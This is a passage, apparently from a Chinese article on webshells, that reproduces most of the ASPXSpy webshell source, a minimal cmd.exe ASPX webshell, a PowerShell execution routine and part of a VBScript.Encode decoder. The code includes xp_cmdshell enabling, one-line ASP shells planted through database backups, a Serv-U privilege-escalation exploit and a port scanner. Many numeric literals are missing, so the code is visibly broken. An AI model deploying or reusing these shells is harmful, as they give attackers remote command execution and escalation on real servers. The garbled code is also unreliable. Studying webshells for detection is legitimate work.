string select = "<input type=hidden name=goaction><input type=hidden name=todo><input type=hidden name=intext><select onchange=if(this.value!='')Command('changedata',this);><option>SQL Server Exec<option value=\"Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')\">Add sp_oacreate<option value=\"Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')\">Add xp_cmdshell<option value=\"Exec master.dbo.xp_cmdshell 'net user'\">Add xp_cmdshell<option value=\"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;\">Add xp_cmdshell(SQL2005)<option value=\"Exec master.dbo.xp_cmdshell 'net user'\">XP_cmdshell exec<option value=\"Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\1.asp';\">SP_oamethod exec<option value=\"sp_makewebtask @outputfile='d:\\web\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))" + "%" + ">''' \">SP_makewebtask make file";
if (Session["Bin_Option"] != null)
{
select += "<option SELECTED>" + Session["Bin_Option"] + "</option>";
}
select += "</select>";
Bin_AccinfoLabel.Text = select;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
} protected void Bin_SAexecButton_Click(object sender, EventArgs e)
{
try
{
Bin_Change();
Bin_DBinfoLabel.Visible = false;
Bin_ExecButton.Visible = false;
Bin_Scroll.Visible = false;
Bin_DataGrid.Visible = false;
Bin_DBmenuPanel.Visible = true;
string sqlstr = Bin_DBstrTextBox.Text;
DataTable databind = Bin_DataTable(sqlstr);
string res = "";
foreach (DataRow dr in databind.Rows)
{
for (int i = ; i < databind.Columns.Count; i++)
{
res += dr[i] + "\r";
}
}
Bin_ResLabel.Text = "<hr><div id=\"nei\"><PRE>" + res.Replace(" ", " ").Replace("<", "<").Replace(">", ">") + "</PRE></div>"; }
catch (Exception error)
{
Bin_Error(error.Message);
} } protected void Bin_DirButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_DBinfoLabel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
} protected void Bin_listButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_DBinfoLabel.Visible = false;
Bin_SqlDir();
}
public void Bin_SqlDir()
{
try
{
Bin_DataGrid.Visible = true;
Bin_Scroll.Visible = true;
Bin_DataGrid.AllowPaging = false;
string exesql = "use pubs;if exists (select * from sysobjects where id = object_id(N'[bin_dir]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_dir]; CREATE TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) INSERT bin_dir EXEC MASTER..XP_dirtree '" + Bin_DirTextBox.Text + "',1,1;";
Bin_ExecSql(exesql);
DataTable sql_dir = Bin_DataTable("select * from bin_dir");
Bin_DataGrid.DataSource = sql_dir;
Bin_DataGrid.DataBind();
}
catch (Exception e)
{
Bin_Error(e.Message);
}
} protected void Bin_SuButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = true;
Bin_IISPanel.Visible = false;
Bin_SuresLabel.Text = "";
Bin_LoginPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = false;
} protected void Bin_dbshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_AccPanel.Visible = false;
Bin_BakDB();
}
public void Bin_BakDB()
{
string path = Bin_DirTextBox.Text.Trim();
if (path.Substring(path.Length - , ) == @"\")
{
path = path + "bin.asp";
}
else
{
path = path + @"\bin.asp";
}
string sql = "if exists (select * from sysobjects where id = object_id(N'[bin_cmd]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup database @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t='" + path + "' backup database @b to disk = @t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}
public void Bin_BakLog()
{
string path = Bin_DirTextBox.Text.Trim();
if (path.Substring(path.Length - , ) == @"\")
{
path = path + "bin.asp";
}
else
{
path = path + @"\bin.asp";
}
string sql = "if exists (select * from sysobjects where id = object_id(N'[bin_cmd]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup log @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t='" + path + "' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
} protected void Bin_LogshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_AccPanel.Visible = false;
Bin_BakLog();
} protected void Bin_SuexpButton_Click(object sender, EventArgs e)
{
string Result = "";
string user = Bin_SunameTextBox.Text;
string pass = Bin_SupassTextBox.Text;
int port = Int32.Parse(Bin_SuportTextBox.Text);
string cmd = Bin_SucmdTextBox.Text;
string loginuser = "user " + user + "\r\n";
string loginpass = "pass " + pass + "\r\n";
string site = "SITE MAINTENANCE\r\n";
string deldomain = "-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
string setdomain = "-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
string newdomain = "-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
string quite = "QUIT\r\n";
try
{
TcpClient tcp = new TcpClient("127.0.0.1", port);
tcp.ReceiveBufferSize = ;
NetworkStream NS = tcp.GetStream();
Result = Rev(NS);
Result += Send(NS, loginuser);
Result += Rev(NS);
Result += Send(NS, loginpass);
Result += Rev(NS);
Result += Send(NS, site);
Result += Rev(NS);
Result += Send(NS, deldomain);
Result += Rev(NS);
Result += Send(NS, setdomain);
Result += Rev(NS);
Result += Send(NS, newdomain);
Result += Rev(NS);
TcpClient tcp1 = new TcpClient("127.0.0.1", );
NetworkStream NS1 = tcp1.GetStream();
Result += Rev(NS1);
Result += Send(NS1, "user bin\r\n");
Result += Rev(NS1);
Result += Send(NS1, "pass binftp\r\n");
Result += Rev(NS1);
Result += Send(NS1, "site exec " + cmd + "\r\n");
Result += Rev(NS1);
tcp1.Close();
Result += Send(NS, deldomain);
Result += Rev(NS);
Result += Send(NS, quite);
Result += Rev(NS);
tcp.Close();
}
catch (Exception error)
{
Bin_Error(error.Message);
}
Bin_SuresLabel.Text = "<div id=\"su\"><pre>" + Result + "</pre></div>"; }
protected string Rev(NetworkStream instream)
{
string Restr = "";
if (instream.CanRead)
{
byte[] buffer = new byte[];
instream.Read(buffer, , buffer.Length);
Restr = Encoding.ASCII.GetString(buffer);
}
return "<font color = red>" + Restr + "</font><br>"; }
protected string Send(NetworkStream instream,string Sendstr)
{
if (instream.CanWrite)
{
byte[] buffer = Encoding.ASCII.GetBytes(Sendstr);
instream.Write(buffer, , buffer.Length);
}
return "<font color = blue>" + Sendstr + "</font><br>";
}
protected void Bin_IISButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible = false;
Bin_MainPanel.Visible = false;
Bin_MenuPanel.Visible = true;
Bin_FilePanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = true;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_iisLabel.Text = Bin_iisinfo(); } protected void Bin_PortButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = true;
Bin_ScanresLabel.Text = "";
} protected void Bin_RegButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_RegPanel.Visible = true;
Bin_PortPanel.Visible = false;
Bin_RegresLabel.Text = ""; } protected void Bin_RegreadButton_Click(object sender, EventArgs e)
{
try
{
string regkey = Bin_KeyTextBox.Text;
string subkey = regkey.Substring(regkey.IndexOf("\\") + , regkey.Length - regkey.IndexOf("\\") - );
RegistryKey rk = null;
if (regkey.Substring(, regkey.IndexOf("\\")) == "HKEY_LOCAL_MACHINE")
{
rk = Registry.LocalMachine.OpenSubKey(subkey);
}
if (regkey.Substring(, regkey.IndexOf("\\")) == "HKEY_CLASSES_ROOT")
{
rk = Registry.ClassesRoot.OpenSubKey(subkey);
}
if (regkey.Substring(, regkey.IndexOf("\\")) == "HKEY_CURRENT_USER")
{
rk = Registry.CurrentUser.OpenSubKey(subkey);
}
if (regkey.Substring(, regkey.IndexOf("\\")) == "HKEY_USERS")
{
rk = Registry.Users.OpenSubKey(subkey);
}
if (regkey.Substring(, regkey.IndexOf("\\")) == "HKEY_CURRENT_CONFIG")
{
rk = Registry.CurrentConfig.OpenSubKey(subkey);
} Bin_RegresLabel.Text = "<br>Result : " + rk.GetValue(Bin_ValueTextBox.Text, "NULL").ToString();
}
catch (Exception error)
{
Bin_Error(error.Message);
}
} protected void Bin_ScancmdButton_Click(object sender, EventArgs e)
{
try
{
string res = "";
string[] port = Bin_PortsTextBox.Text.Split(',');
for (int i = ; i < port.Length; i++)
{
res += Bin_Scan(Bin_ScanipTextBox.Text, Int32.Parse(port[i])) + "<br>";
}
Bin_ScanresLabel.Text = "<hr>" + res;
}
catch (Exception error)
{
Bin_Error(error.Message);
}
}
protected string Bin_Scan(string ip, int port)
{ string scanres = "";
TcpClient tcp = new TcpClient();
tcp.SendTimeout = tcp.ReceiveTimeout = ;
try
{
tcp.Connect(ip, port);
tcp.Close();
scanres = ip + " : " + port + " ................................. <font color=green><b>Open</b></font>";
}
catch (SocketException e)
{
scanres = ip + " : " + port + " ................................. <font color=red><b>Close</b></font>";
}
return scanres;
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>ASPXSpy1. -> Bin:)</title>
<style type="text/css">
A:link {
COLOR:#; TEXT-DECORATION:None
}
A:visited {
COLOR:#; TEXT-DECORATION:None
}
A:active {
COLOR:#; TEXT-DECORATION:None
}
A:hover {
COLOR:#; TEXT-DECORATION:underline
}
BODY {
FONT-SIZE: 9pt;
FONT-FAMILY: "Courier New";
}
#nei {
width:500px;
margin:0px auto; overflow:hidden
}
#su {
width:300px;
margin:0px auto; overflow:hidden
}
#cmd {
width:500px;
margin:0px auto; overflow:hidden
}
</style>
<script type="text/javascript" language="javascript" >
function Command(cmd, str)
{
var strTmp = str;
var frm = document.forms[];
if(cmd == 'del')
{
if(confirm('Del It ?'))
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
else return;
}
if (cmd == 'change')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'down')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'showatt')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'edit')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'deldir')
{
if(confirm('Del It ?'))
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
else return;
}
if(cmd == 'rename' )
{
frm.goaction.value = cmd;
frm.todo.value = str + ',';
str = prompt('Please input new filename:', strTmp);
if(str && (strTmp != str))
{
frm.todo.value += str;
frm.submit();
}
else return;
}
if(cmd == 'renamedir' )
{
frm.goaction.value = cmd;
frm.todo.value = str + ',';
str = prompt('Please input new foldername:', strTmp);
if(str && (strTmp != str))
{
frm.todo.value += str;
frm.submit();
}
else return;
}
if (cmd == 'postdata')
{
frm.todo.value = str.value;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'changedata')
{
frm.todo.value = str.value;
frm.intext.value = str.options[str.selectedIndex].innerText
frm.goaction.value = cmd;
frm.submit();
}
} </script>
</head>
<body>
<form id="form1" runat="server"><div style="text-align: center"><asp:Panel ID="Bin_LoginPanel" runat="server" Height="47px" Width="401px">
<asp:Label ID="PassLabel" runat="server" Text="Password:"></asp:Label>
<asp:TextBox ID="passtext" runat="server" TextMode="Password" Width="203px"></asp:TextBox>
<asp:Button ID="LoginButton" runat="server" Text="Enter" OnClick="LoginButton_Click" /><p />
Copyright (C) Bin -> <a href="http://www.rootkit.net.cn" target="_blank">WwW.RoOTkIt.NeT.Cn</a></asp:Panel><asp:Panel ID="Bin_MenuPanel" runat="server" Height="56px" Width="771px">
<asp:Label ID="TimeLabel" runat="server" Text="Label" Width="150px"></asp:Label><br />
<asp:Button ID="MainButton" runat="server" OnClick="MainButton_Click" Text="Sysinfo" />
<asp:Button ID="Bin_IISButton" runat="server" OnClick="Bin_IISButton_Click" Text="IISSpy" />
<asp:Button ID="FileButton" runat="server" OnClick="FileButton_Click" Text="WebShell" />
<asp:Button ID="Bin_CmdButton" runat="server" Text="Command" OnClick="Bin_CmdButton_Click" />
<asp:Button ID="Bin_SQLButton" runat="server" OnClick="Bin_SQLButton_Click" Text="SqlTools" /> <asp:Button
ID="Bin_SuButton" runat="server" OnClick="Bin_SuButton_Click" Text="SuExp" />
<asp:Button ID="Bin_PortButton" runat="server" Text="PortScan" OnClick="Bin_PortButton_Click" />
<asp:Button ID="Bin_RegButton" runat="server" Text="RegShell" OnClick="Bin_RegButton_Click" />
<asp:Button ID="LogoutButton" runat="server" OnClick="LogoutButton_Click" Text="Logout" /><br />
<asp:Label ID="Bin_ErrorLabel" runat="server" EnableViewState="False">Copyright (C) Bin -> <a href="http://www.rootkit.net.cn" target="_blank">WwW.RoOTkIt.NeT.Cn</a> -> <a href="http://www.rootkit.net.cn/index.aspx" target="_blank">Reverse-IP</a> </asp:Label></asp:Panel>
<asp:Panel ID="Bin_MainPanel" runat="server" Width="769px" EnableViewState="False" Visible="False" Height="20px">
<div style="text-align: left"><asp:Label ID="InfoLabel" runat="server" Width="765px" EnableViewState="False" ></asp:Label></div></asp:Panel><div style="text-align: center">
<asp:Panel ID="Bin_FilePanel" runat="server" Width="767px" EnableViewState="False" Visible="False"><div style="text-align: left"><asp:Label ID="Bin_FileLabel" runat="server" Text="Label" Width="764px"></asp:Label><br />
<asp:Label ID="Bin_UpfileLabel" runat="server" Text="Upfile : "></asp:Label>
<input class="TextBox" id="Bin_UpFile" type="file" name="upfile" runat="server" /> <asp:TextBox ID="Bin_upTextBox" runat="server" Width="339px"></asp:TextBox>
<asp:Button ID="Bin_GoButton" runat="server" OnClick="Bin_GoButton_Click" Text="GO" />
<asp:Button ID="Bin_upButton" runat="server" Text="UpLoad" OnClick="Bin_upButton_Click" EnableViewState="False" /><br />
<asp:Label ID="Bin_CreateLabel" runat="server" Text="Create :"></asp:Label>
<asp:TextBox ID="Bin_CreateTextBox" runat="server"></asp:TextBox><asp:Button ID="Bin_NewFileButton"
runat="server" Text="NewFile" OnClick="Bin_NewFileButton_Click" />
<asp:Button ID="Bin_NewdirButton" runat="server" Text="NewDir" OnClick="Bin_NewdirButton_Click" />
<br />
<asp:Label ID="Bin_CopyLabel" runat="server" Text="Copy :" Width="39px"></asp:Label>
<asp:TextBox ID="Bin_CopyTextBox" runat="server" Width="273px"></asp:TextBox>
<asp:Label ID="Bin_CopytoLable" runat="server" Text="To:"></asp:Label>
<asp:TextBox ID="Bin_CopytoTextBox" runat="server" Width="268px"></asp:TextBox>
<asp:Button ID="Bin_CopyButton" runat="server" Text="Copy" OnClick="Bin_CopyButton_Click" />
<asp:Button ID="Bin_CutButton" runat="server" Text="Cut" Width="46px" OnClick="Bin_CutButton_Click" />
<asp:Label ID="Bin_FilelistLabel" runat="server" EnableViewState="False"></asp:Label></div><div style="text-align: center">
<asp:Panel ID="Bin_AttPanel" runat="server" Width="765px" Visible="False"><hr />
FileName :
<asp:Label ID="Bin_AttLabel" runat="server" Text="Label"></asp:Label><br />
<asp:CheckBox ID="Bin_ReadOnlyCheckBox" runat="server" Text="ReadOnly" />
<asp:CheckBox ID="Bin_SystemCheckBox" runat="server" Text="System" />
<asp:CheckBox ID="Bin_HiddenCheckBox" runat="server" Text="Hidden" />
<asp:CheckBox ID="Bin_ArchiveCheckBox" runat="server" Text="Archive" />
<br />
CreationTime :
<asp:TextBox ID="Bin_CreationTimeTextBox" runat="server" Width="123px"></asp:TextBox>
LastWriteTime :
<asp:TextBox ID="Bin_LastWriteTimeTextBox" runat="server" Width="129px"></asp:TextBox>
LastAccessTime :
<asp:TextBox ID="Bin_AccessTimeTextBox" runat="server" Width="119px"></asp:TextBox><br />
<asp:Button ID="Bin_SetButton" runat="server" OnClick="Bin_SetButton_Click" Text="Set" />
<asp:Button ID="Bin_SbackButton" runat="server" OnClick="Bin_SbackButton_Click" Text="Back" />
<hr />
</asp:Panel></div>
<div style="text-align: center"><asp:Panel ID="Bin_EditPanel" runat="server" Visible="False"><hr style="width: 757px" />
Path:<asp:TextBox ID="Bin_EditpathTextBox" runat="server" Width="455px"></asp:TextBox><br />
<asp:TextBox ID="Bin_EditTextBox" runat="server" TextMode="MultiLine" Columns="" Rows="" Width="760px"></asp:TextBox><br />
<asp:Button ID="Bin_EditButton" runat="server" Text="Sumbit" OnClick="Bin_EditButton_Click" /> <asp:Button
ID="Bin_BackButton" runat="server" OnClick="Bin_BackButton_Click" Text="Back" /></asp:Panel></div></asp:Panel></div>
<asp:Panel ID="Bin_CmdPanel" runat="server" Height="50px" Width="763px"><hr />
CmdPath : <asp:TextBox ID="Bin_CmdPathTextBox" runat="server" Width="395px">C:\Windows\System32\Cmd.exe</asp:TextBox><br />
Argument :
<asp:TextBox ID="Bin_CmdShellTextBox" runat="server" Width="395px">/c Set</asp:TextBox><br />
<asp:Button ID="Bin_RunButton" runat="server" OnClick="Bin_RunButton_Click" Text="Run" />
<div style="text-align: left">
<asp:Label ID="Bin_CmdLabel" runat="server" EnableViewState="False"></asp:Label></div>
<hr /></asp:Panel>
<asp:Panel ID="Bin_SQLPanel" runat="server" Visible="False" Width="763px">
<hr />
ConnString :
<asp:TextBox ID="Bin_SQLconnTextBox" runat="server" Width="547px">server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB</asp:TextBox><br />
<asp:RadioButton ID="Bin_SQLRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_SQLRadioButton_CheckedChanged" Text="MS-SQL" Checked="True" />
<asp:RadioButton ID="Bin_AccRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_AccRadioButton_CheckedChanged" Text="MS-Access" />
<asp:Button ID="SQL_SumbitButton" runat="server" Text="Sumbit" OnClick="SQL_SumbitButton_Click" /><hr />
<asp:Panel ID="Bin_DBmenuPanel" runat="server" Width="759px" Visible="False">
<asp:Button ID="Bin_BDButton" runat="server" Text="DataBase" OnClick="Bin_BDButton_Click" />
<asp:Button ID="Bin_SACMDButton" runat="server" Text="SA_Exec" OnClick="Bin_SACMDButton_Click" />
<asp:Button ID="Bin_DirButton" runat="server" Text="SQL_Dir" OnClick="Bin_DirButton_Click" /><br /><hr /><div style="text-align: left">
<asp:Label ID="Bin_DBinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label></div></asp:Panel>
<asp:Panel ID="Bin_AccPanel" runat="server" Height="50px" Width="759px" EnableViewState="False">
<asp:Label ID="Bin_AccinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label><br />
<asp:TextBox ID="Bin_DBstrTextBox" runat="server" TextMode="MultiLine" Width="569px"></asp:TextBox>
<asp:Button ID="Bin_ExecButton" runat="server" OnClick="Bin_ExecButton_Click" Text="Exec" />
<asp:Button ID="Bin_SAexecButton" runat="server" Text="SA_Exec" OnClick="Bin_SAexecButton_Click" /><br />
<div style="text-align:left">
<asp:Label ID="Bin_ResLabel" runat="server" ></asp:Label></div></asp:Panel>
<asp:Panel ID="Bin_dirPanel" runat="server" Visible="False" Width="759px">
Path :
<asp:TextBox ID="Bin_DirTextBox" runat="server" Width="447px">c:\</asp:TextBox>
<br />
<asp:Button ID="Bin_listButton" runat="server" OnClick="Bin_listButton_Click" Text="Dir" /> <asp:Button
ID="Bin_dbshellButton" runat="server" OnClick="Bin_dbshellButton_Click" Text="Bak_DB" />
<asp:Button ID="Bin_LogshellButton" runat="server" Text="Bak_LOG" OnClick="Bin_LogshellButton_Click" /><hr /></asp:Panel>
<br /><br />
<div style="overflow:scroll; text-align:left; width:770px;" id="Bin_Scroll" runat="server" visible="false" >
<asp:DataGrid ID="Bin_DataGrid" runat="server" Width="753px" PageSize="" CssClass="Bin_DataGrid" OnItemDataBound="Item_DataBound" AllowPaging="True" OnPageIndexChanged="Bin_DBPage" OnItemCommand="Item_Command">
<PagerStyle Mode="NumericPages" Position="TopAndBottom" />
</asp:DataGrid></div>
</asp:Panel>
<asp:Panel ID="Bin_SuPanel" runat="server" Width="763px" >
<hr />
Name :
<asp:TextBox ID="Bin_SunameTextBox" runat="server">localadministrator</asp:TextBox>
Pass :
<asp:TextBox ID="Bin_SupassTextBox" runat="server">#l@$ak#.lk;@P</asp:TextBox>
Port :
<asp:TextBox ID="Bin_SuportTextBox" runat="server"></asp:TextBox><br />
CMD :
<asp:TextBox ID="Bin_SucmdTextBox" runat="server" Width="447px">cmd.exe /c net user</asp:TextBox><br />
<asp:Button ID="Bin_SuexpButton" runat="server" Text="Exploit" OnClick="Bin_SuexpButton_Click" /><br />
<div style="text-align:left">
<hr />
<asp:Label ID="Bin_SuresLabel" runat="server"></asp:Label>
</div>
</asp:Panel>
<asp:Panel ID="Bin_IISPanel" runat="server" Width="763px"><div style="text-align:left">
<hr />
<asp:Label ID="Bin_iisLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label> </div></asp:Panel>
<asp:Panel ID="Bin_RegPanel" runat="server" Width="763px"><hr /><div style="text-align:left">
KEY : <asp:TextBox ID="Bin_KeyTextBox" runat="server" Width="595px">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br />
VALUE :
<asp:TextBox ID="Bin_ValueTextBox" runat="server" Width="312px">ComputerName</asp:TextBox> <asp:Button
ID="Bin_RegreadButton" runat="server" Text="Read" OnClick="Bin_RegreadButton_Click" /><br />
<asp:Label ID="Bin_RegresLabel" runat="server"></asp:Label><hr /></div></asp:Panel>
<asp:Panel ID="Bin_PortPanel" runat="server" Width="763px">
<hr /><div style="text-align:left">
IP :
<asp:TextBox ID="Bin_ScanipTextBox" runat="server" Width="194px">127.0.0.1</asp:TextBox>
PORT :
<asp:TextBox ID="Bin_PortsTextBox" runat="server" Width="356px">,,,,,,,,</asp:TextBox>
<asp:Button ID="Bin_ScancmdButton" runat="server" Text="Scan" OnClick="Bin_ScancmdButton_Click" /><br />
<asp:Label ID="Bin_ScanresLabel" runat="server"></asp:Label></div><hr /></asp:Panel> </div></form>
</body>
</html>
0x2: CMS WEBSHELL
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<script runat="server">
protected void exec(object sender, EventArgs e)
{
string item = cmd.Text;
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
string strOutput = null;
p.Start();
p.StandardInput.WriteLine(item);
p.StandardInput.WriteLine("exit");
strOutput = p.StandardOutput.ReadToEnd();
p.WaitForExit();
p.Close();
Response.Write("<pre>");
Response.Write(strOutput);
Response.Write("</pre>");
}
protected void Page_Load(object sender, EventArgs e)
{
}
</script>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="dir c:" /><asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
</form>
Relevant Link:
http://www.jb51.net/article/26387.htm
http://blog.csdn.net/zaiyong/article/details/25873399
https://raw.githubusercontent.com/tennc/webshell/master/net-friend/aspx/aspxspy.aspx
http://www.jb51.net/article/39983.htm
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
https://github.com/tennc/webshell/blob/master/aspx/icesword.aspx
0x3: PowerShell Webshell
string do_ps(string arg)
{
//This section based on cmdasp webshell by http://michaeldaw.org
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "powershell.exe";
psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
Relevant Link:
https://www.microsoft.com/taiwan/technet/columns/profwin/28-monad.mspx
https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx
5. webshell中常见的编码转换隐藏方式
0x1: VBScript.encode
Public Function DCScript(ByVal Script As String) As String
Dim s As String, l As Long
Dim b As Long, e As Long
Dim k As Long
l = LenB(Script): s = Space(l) '...
b = InStr(Script, "#@~^") '#@~^******==
e = InStr(Script, "^#~@") '******==^#~@
If b = Or e = Then
If MsgBox("没找到密文开始/结束标识,解密结果可能有误!要继续吗?", vbYesNo) = vbNo Then
Exit Function
Else
If e = Then e = l Else e = e -
If b = Then b = Else b = b +
End If
Else
b = b + '为0则全部解密
e = e - '为0则算到末尾
End If
frmMain.Caption = "Decoding ..."
Script = Mid(Script, b, e - b + )
'Script = Replace(Script, "@#", Chr(13))
'Script = Replace(Script, "@&", Chr(10))
Script = Replace(Script, "@#@&", Chr() + Chr()) 'vbcCrlf
Script = Replace(Script, "@!", "<")
Script = Replace(Script, "@*", ">")
Script = Replace(Script, "@$", "@") '最后生成@ 'k = YXScrDecode(Script, s, Len(Script))
k = YXScrDecoder(Script, s)
's = Replace(s, Chr(13) + Chr(2), vbCrLf)'查出来是0x10和0x0A的原因
'引出另一个问题,为什么char数组第-1个元素为0x02
frmMain.Caption = "碰到我算你倒霉!"
DCScript = Left(s, k)
End Function
perl代码
#!/usr/bin/perl -w -- # VBScript/JScript.Encode Decoder # Based on Full-Disclosure message "VBScript/JScript.Encode Decoder"
# by Andreas Marx <amarx [at] gega-it>, dated Sep
# http://lists.netsys.com/pipermail/full-disclosure/2003-September/010155.html
#
# See also:
# http://www.saltstorm.net/lib-soya/examples/Soya.Encode.ScriptDecoder.wbm
# http://www.saltstorm.net/lib-soya/Soya/Encode/ScriptDecoder.js
# http://www.virtualconspiracy.com/scrdec.html
# http://www.virtualconspiracy.com/download/scrdec14.c
# http://www.r4k.net/dec/dec.pl @itab = ( # table order
,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,); @dectab0 = ( # tables to decrypt
"\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x57","\x0A","\x0B","\x0C","\x0D","\x0E","\x0F",
"\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F",
"\x2E","\x47","\x7A","\x56","\x42","\x6A","\x2F","\x26","\x49","\x41","\x34","\x32","\x5B","\x76","\x72","\x43",
"\x38","\x39","\x70","\x45","\x68","\x71","\x4F","\x09","\x62","\x44","\x23","\x75","\x3C","\x7E","\x3E","\x5E",
"\xFF","\x77","\x4A","\x61","\x5D","\x22","\x4B","\x6F","\x4E","\x3B","\x4C","\x50","\x67","\x2A","\x7D","\x74",
"\x54","\x2B","\x2D","\x2C","\x30","\x6E","\x6B","\x66","\x35","\x25","\x21","\x64","\x4D","\x52","\x63","\x3F",
"\x7B","\x78","\x29","\x28","\x73","\x59","\x33","\x7F","\x6D","\x55","\x53","\x7C","\x3A","\x5F","\x65","\x46",
"\x58","\x31","\x69","\x6C","\x5A","\x48","\x27","\x5C","\x3D","\x24","\x79","\x37","\x60","\x51","\x20","\x36"); @dectab1 = (
